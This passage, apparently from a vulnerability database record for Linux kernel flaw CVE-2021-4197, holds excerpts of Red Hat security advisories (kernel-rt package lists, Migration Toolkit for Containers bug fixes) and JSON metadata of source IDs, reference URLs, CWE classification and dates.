v1\n\niQIVAwUBYvKietzjgjWX9erEAQjQ7g/+Ok8sWBeaehUxS8YKMtNEdLzO8Eg5TKfA\n3MoORr+P+WZIQFy7pN/GeKojlsy1ApnNEnc7j0qC2dibUBfguOWEoAMdds07DwF3\nJw3iANT5sJZv3s4yT9FvYu9Wnwl/iYJ9w8iH19oePFFKg0QtxAWUvSlIvp2eSZ1L\nyw86wqAzASDqc86Y0fkIvmxopq80lyI//rNqPXsATKq1oGFRstQmfUz+2UxonlMC\ntVUfRJjlPDZDU57EpBcxWH/TVPV/JdvcQPQEOJ+u+ZVg2H4qEwptqpgjZ4upYbMJ\nAAIymXUwmX9QHOcXSOiZ+1DZMJawj5ezkqGwQIl919w3bX/m6peQPbBBoYbXLSrS\ngtRwgshIIZTs6AzOOVm6+XOSKGRR/C9i1YjNUBF6oY4s+wVtYJvtRwdNrKtH7pCT\nb0FMcLGG0yo/pGuMfB6zmgEn/tEL0IGqoSeN5avb+NObEDYWMGru4sBjdaA66wu4\n1JfPAP/yQ7rW0NXleJXjv9Xhdae7b8en9YxlsWLcp/QE8bppT6tjyIW/aVXEZZva\n/B1ACyosleJYYYYoqqbU97mCaG/LfH/fz7euD9GgJXOCjGNoHAkKe/DOXg7YTSZP\naDbtU3ZeESqyRpAJ8nkM4lZLFTxYNmDp+8tWMx6UXQnNRBOMW4bEQRtzTQB+vrWH\nfzoc8e3L82I=ARFk\n-----END PGP SIGNATURE-----\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Real Time EUS (v.8.4) - x86_64\nRed Hat Enterprise Linux Real Time for NFV EUS (v.8.4) - x86_64\n\n3. Description:\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which enables\nfine-tuning for systems with extremely high determinism requirements. \n\nSecurity Fix(es):\n\n* kernel: Small table perturb size in the TCP source port generation\nalgorithm can lead to information leak (CVE-2022-1012)\n\n* kernel: race condition in perf_event_open leads to privilege escalation\n(CVE-2022-1729)\n\n* kernel: a use-after-free write in the netfilter subsystem can lead to\nprivilege escalation to root (CVE-2022-32250)\n\n* kernel: cgroup: Use open-time creds and namespace for migration perm\nchecks (CVE-2021-4197)\n\n* kernel: Race condition in races in sk_peer_pid and sk_peer_cred accesses\n(CVE-2021-4203)\n\n* kernel: the copy-on-write implementation can grant unintended write\naccess because of a race condition in a THP mapcount check (CVE-2020-29368)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nBug Fix(es):\n\n* kernel-rt: update RT source tree to the RHEL-8.4.z10 source tree\n(BZ#2087922)\n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. Bugs fixed (https://bugzilla.redhat.com/):\n\n1903244 - CVE-2020-29368 kernel: the copy-on-write implementation can grant unintended write access because of a race condition in a THP mapcount check\n2035652 - CVE-2021-4197 kernel: cgroup: Use open-time creds and namespace for migration perm checks\n2036934 - CVE-2021-4203 kernel: Race condition in races in sk_peer_pid and sk_peer_cred accesses\n2064604 - CVE-2022-1012 kernel: Small table perturb size in the TCP source port generation algorithm can lead to information leak\n2086753 - CVE-2022-1729 kernel: race condition in perf_event_open leads to privilege escalation\n2092427 - CVE-2022-32250 kernel: a use-after-free write in the netfilter subsystem can lead to privilege escalation to root\n\n6. Package List:\n\nRed Hat Enterprise Linux Real Time for NFV EUS (v.8.4):\n\nSource:\nkernel-rt-4.18.0-305.57.1.rt7.129.el8_4.src.rpm\n\nx86_64:\nkernel-rt-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm\nkernel-rt-core-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm\nkernel-rt-debug-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm\nkernel-rt-debug-core-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm\nkernel-rt-debug-debuginfo-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm\nkernel-rt-debug-devel-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm\nkernel-rt-debug-kvm-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm\nkernel-rt-debug-modules-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm\nkernel-rt-debug-modules-extra-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm\nkernel-rt-debuginfo-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm\nkernel-rt-debuginfo-common-x86_64-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm\nkernel-rt-devel-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm\nkernel-rt-kvm-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm\nkernel-rt-modules-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm\nkernel-rt-modules-extra-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm\n\nRed Hat Enterprise Linux Real Time EUS (v.8.4):\n\nSource:\nkernel-rt-4.18.0-305.57.1.rt7.129.el8_4.src.rpm\n\nx86_64:\nkernel-rt-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm\nkernel-rt-core-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm\nkernel-rt-debug-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm\nkernel-rt-debug-core-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm\nkernel-rt-debug-debuginfo-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm\nkernel-rt-debug-devel-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm\nkernel-rt-debug-modules-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm\nkernel-rt-debug-modules-extra-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm\nkernel-rt-debuginfo-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm\nkernel-rt-debuginfo-common-x86_64-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm\nkernel-rt-devel-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm\nkernel-rt-modules-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm\nkernel-rt-modules-extra-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. Summary:\n\nThe Migration Toolkit for Containers (MTC) 1.7.2 is now available. Description:\n\nThe Migration Toolkit for Containers (MTC) enables you to migrate\nKubernetes resources, persistent volume data, and internal container images\nbetween OpenShift Container Platform clusters, using the MTC web console or\nthe Kubernetes API. Bugs fixed (https://bugzilla.redhat.com/):\n\n2007557 - CVE-2021-3807 nodejs-ansi-regex: Regular expression denial of service (ReDoS) matching ANSI escape codes\n2038898 - [UI] ?Update Repository? option not getting disabled after adding the Replication Repository details to the MTC web console\n2040693 - ?Replication repository? wizard has no validation for name length\n2040695 - [MTC UI] ?Add Cluster? wizard stucks when the cluster name length is more than 63 characters\n2044591 - CVE-2022-0235 node-fetch: exposure of sensitive information to an unauthorized actor\n2048537 - Exposed route host to image registry? connecting successfully to invalid registry ?xyz.com?\n2053259 - CVE-2022-0536 follow-redirects: Exposure of Sensitive Information via Authorization Header leak\n2055658 - [MTC UI] Cancel button on ?Migrations? page does not disappear when migration gets Failed/Succeeded with warnings\n2056962 - [MTC UI] UI shows the wrong migration type info after changing the target namespace\n2058172 - [MTC UI] Successful Rollback is not showing the green success icon in the ?Last State? field. \n2058529 - [MTC UI] Migrations Plan is missing the type for the state migration performed before upgrade\n2061335 - [MTC UI] ?Update cluster? button is not getting disabled\n2062266 - MTC UI does not display logs properly [OADP-BL]\n2062862 - [MTC UI] Clusters page behaving unexpectedly on deleting the remote cluster?s service account secret from backend\n2074675 - HPAs of DeploymentConfigs are not being updated when migration from Openshift 3.x to Openshift 4.x\n2076593 - Velero pod log missing from UI drop down\n2076599 - Velero pod log missing from downloaded logs folder [OADP-BL]\n2078459 - [MTC UI] Storageclass conversion plan is adding migstorage reference in migplan\n2079252 - [MTC] Rsync options logs not visible in log-reader pod\n2082221 - Don\u0027t allow Storage class conversion migration if source cluster has only one storage class defined [UI]\n2082225 - non-numeric user when launching stage pods [OADP-BL]\n2088022 - Default CPU requests on Velero/Restic are too demanding making scheduling fail in certain environments\n2088026 - Cloud propagation phase in migration controller is not doing anything due to missing labels on Velero pods\n2089126 - [MTC] Migration controller cannot find Velero Pod because of wrong labels\n2089411 - [MTC] Log reader pod is missing velero and restic pod logs [OADP-BL]\n2089859 - [Crane] DPA CR is missing the required flag - Migration is getting failed at the EnsureCloudSecretPropagated phase due to the missing secret VolumeMounts\n2090317 - [MTC] mig-operator failed to create a DPA CR due to null values are passed instead of int [OADP-BL]\n2096939 - Fix legacy operator.yml inconsistencies and errors\n2100486 - [MTC UI] Target storage class field is not getting respected when clusters don\u0027t have replication repo configured",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-4197"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-019487"
},
{
"db": "VULHUB",
"id": "VHN-410862"
},
{
"db": "PACKETSTORM",
"id": "169305"
},
{
"db": "PACKETSTORM",
"id": "167746"
},
{
"db": "PACKETSTORM",
"id": "167330"
},
{
"db": "PACKETSTORM",
"id": "168019"
},
{
"db": "PACKETSTORM",
"id": "167886"
},
{
"db": "PACKETSTORM",
"id": "167822"
},
{
"db": "PACKETSTORM",
"id": "167694"
},
{
"db": "PACKETSTORM",
"id": "167679"
}
],
"trust": 2.43
},
"exploit_availability": {
"_id": null,
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-410862",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-410862"
}
]
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2021-4197",
"trust": 3.5
},
{
"db": "JVNDB",
"id": "JVNDB-2021-019487",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "167694",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "167746",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "168019",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "167822",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "167886",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "167443",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "168136",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "166392",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167097",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167952",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167748",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167714",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167852",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167072",
"trust": 0.1
},
{
"db": "CNNVD",
"id": "CNNVD-202201-1396",
"trust": 0.1
},
{
"db": "CNVD",
"id": "CNVD-2022-68560",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-410862",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "169305",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167330",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167679",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-410862"
},
{
"db": "PACKETSTORM",
"id": "169305"
},
{
"db": "PACKETSTORM",
"id": "167746"
},
{
"db": "PACKETSTORM",
"id": "167330"
},
{
"db": "PACKETSTORM",
"id": "168019"
},
{
"db": "PACKETSTORM",
"id": "167886"
},
{
"db": "PACKETSTORM",
"id": "167822"
},
{
"db": "PACKETSTORM",
"id": "167694"
},
{
"db": "PACKETSTORM",
"id": "167679"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-019487"
},
{
"db": "NVD",
"id": "CVE-2021-4197"
}
]
},
"id": "VAR-202201-0496",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-410862"
}
],
"trust": 0.725
},
"last_update_date": "2026-03-09T20:52:51.837000Z",
"patch": {
"_id": null,
"data": [
{
"title": "NTAP-20220602-0006 Oracle Oracle\u00a0Critical\u00a0Patch\u00a0Update",
"trust": 0.8,
"url": "https://www.broadcom.com/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-019487"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-287",
"trust": 1.1
},
{
"problemtype": "Inappropriate authentication (CWE-287) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-410862"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-019487"
},
{
"db": "NVD",
"id": "CVE-2021-4197"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 1.9,
"url": "https://www.debian.org/security/2022/dsa-5127"
},
{
"trust": 1.9,
"url": "https://www.debian.org/security/2022/dsa-5173"
},
{
"trust": 1.9,
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2035652"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-4197"
},
{
"trust": 1.1,
"url": "https://security.netapp.com/advisory/ntap-20220602-0006/"
},
{
"trust": 1.1,
"url": "https://www.oracle.com/security-alerts/cpujul2022.html"
},
{
"trust": 1.0,
"url": "https://lore.kernel.org/lkml/20211209214707.805617-1-tj%40kernel.org/t/"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1353"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.4,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.4,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-4197"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-4203"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1199"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1198"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1205"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1516"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1204"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3752"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1679"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1419"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1652"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1734"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-4202"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3752"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-4157"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3744"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-13974"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-41617"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-45485"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3773"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-4002"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-29154"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-43976"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-0941"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-43389"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3634"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-27820"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-4189"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-44733"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-1271"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-21781"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3634"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-19131"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-4037"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-29154"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-1154"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-37159"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-4788"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3772"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-0404"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3669"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3764"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-20322"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-43056"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3612"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-41864"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25032"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-0941"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-35492"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3612"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-35492"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-26401"
},
{
"trust": 0.2,
"url": "https://docs.openshift.com/container-platform/latest/migration_toolkit_for_containers/installing-mtc.html"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-27820"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3807"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3743"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3737"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-1011"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-13974"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20322"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-4083"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-45486"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0322"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-4788"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-26401"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0286"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0001"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3759"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-21781"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0002"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2018-25032"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-19131"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-42739"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-0404"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-1729"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-32250"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-4203"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1729"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-1012"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-29368"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1012"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32250"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-29368"
},
{
"trust": 0.1,
"url": "https://lore.kernel.org/lkml/20211209214707.805617-1-tj@kernel.org/t/"
},
{
"trust": 0.1,
"url": "https://www.debian.org/security/faq"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-27666"
},
{
"trust": 0.1,
"url": "https://www.debian.org/security/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26490"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1158"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1016"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1195"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1048"
},
{
"trust": 0.1,
"url": "https://security-tracker.debian.org/tracker/linux"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0168"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3760"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-39714"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0330"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-21123"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-39685"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3609"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-5513-1"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:4814"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3669"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-39293"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3772"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3773"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3743"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3764"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-37159"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3737"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3759"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-39293"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-4002"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3744"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3807"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-34169"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-21540"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.9/updating/updating-cluster-cli.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-21540"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-21541"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-34169"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-21541"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2403"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhba-2022:5878"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2403"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:5879"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2380"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1011"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-28388"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-28389"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-5541-1"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:5633"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-28356"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-5500-1"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0536"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0235"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-26691"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:5483"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-23852"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-410862"
},
{
"db": "PACKETSTORM",
"id": "169305"
},
{
"db": "PACKETSTORM",
"id": "167746"
},
{
"db": "PACKETSTORM",
"id": "167330"
},
{
"db": "PACKETSTORM",
"id": "168019"
},
{
"db": "PACKETSTORM",
"id": "167886"
},
{
"db": "PACKETSTORM",
"id": "167822"
},
{
"db": "PACKETSTORM",
"id": "167694"
},
{
"db": "PACKETSTORM",
"id": "167679"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-019487"
},
{
"db": "NVD",
"id": "CVE-2021-4197"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-410862",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "169305",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "167746",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "167330",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "168019",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "167886",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "167822",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "167694",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "167679",
"ident": null
},
{
"db": "JVNDB",
"id": "JVNDB-2021-019487",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2021-4197",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2022-03-23T00:00:00",
"db": "VULHUB",
"id": "VHN-410862",
"ident": null
},
{
"date": "2022-05-28T19:12:00",
"db": "PACKETSTORM",
"id": "169305",
"ident": null
},
{
"date": "2022-07-14T14:32:14",
"db": "PACKETSTORM",
"id": "167746",
"ident": null
},
{
"date": "2022-05-31T17:24:53",
"db": "PACKETSTORM",
"id": "167330",
"ident": null
},
{
"date": "2022-08-10T15:50:18",
"db": "PACKETSTORM",
"id": "168019",
"ident": null
},
{
"date": "2022-07-29T14:39:49",
"db": "PACKETSTORM",
"id": "167886",
"ident": null
},
{
"date": "2022-07-27T17:20:56",
"db": "PACKETSTORM",
"id": "167822",
"ident": null
},
{
"date": "2022-07-04T14:32:13",
"db": "PACKETSTORM",
"id": "167694",
"ident": null
},
{
"date": "2022-07-01T15:04:32",
"db": "PACKETSTORM",
"id": "167679",
"ident": null
},
{
"date": "2023-08-02T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2021-019487",
"ident": null
},
{
"date": "2022-03-23T20:15:10.200000",
"db": "NVD",
"id": "CVE-2021-4197",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2023-02-03T00:00:00",
"db": "VULHUB",
"id": "VHN-410862",
"ident": null
},
{
"date": "2023-08-02T06:47:00",
"db": "JVNDB",
"id": "JVNDB-2021-019487",
"ident": null
},
{
"date": "2024-11-21T06:37:07.517000",
"db": "NVD",
"id": "CVE-2021-4197",
"ident": null
}
]
},
